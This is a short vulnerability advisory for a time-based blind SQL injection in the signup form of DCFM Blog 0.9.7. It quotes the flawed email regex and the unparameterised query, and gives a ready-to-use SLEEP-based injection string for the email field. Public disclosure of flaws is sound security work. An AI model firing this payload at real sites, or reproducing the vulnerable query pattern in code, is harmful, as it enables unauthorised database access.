DCFM Blog Version 0.9.7 Blind SQL Injection Vulnerability ( time based-attack )
================================================================================



Discovered by N_A , N_A[at]tutanota.com
========================================




Description
============

Open-source blog project. Free blog system for any website. Uses MySQL and PHP 5. Very easily customizable and incredibly flexible.

https://sourceforge.net/projects/dcfm-blog/




Vulnerability
==============

A blind SQL Injection is possible within the signup.php file of DCFM Blog version 0.9.7.



$desuser = $_POST['desuser'];
$despass = $_POST['despass'];
$email = $_POST['email'];                      <---- The vulnerable variable
$firstname = $_POST['firstname'];
$lastname = $_POST['lastname'];
$submitted = $_POST['submitted'];
$despassconfirm = $_POST['despassconfirm'];



The $email variable is not properly checked as the regex does not stop additional characters from being added once the variable matches a valid email format:

if(!ereg("^.+@.+\\..+$",$email)) {
      $evil = 1;
      $error="<p>
      The highlighted fields are not filled out correctly.
      </p>";      



the '.+' part of the regular expression will match "one or more of any character" . It is then possible to attached a crafted SQL Injection string to the end of the $email variable.

The crafted string is fed directly into the MySql database:

$result = mysql_query("SELECT * FROM accounts
    WHERE Email='$_POST[email]'");
    while($row = mysql_fetch_array($result)) {
      if ($email == $row['Email'])






Proof Of Concept Exploit String
================================



Fill out the whole form and input the email variable as follows:

jimmy@site.com' AND (SELECT * FROM (SELECT(SLEEP(5)))MXKf) AND 'dBWQ'='dBWQ





Email
=====

N_A[at]tutanota.com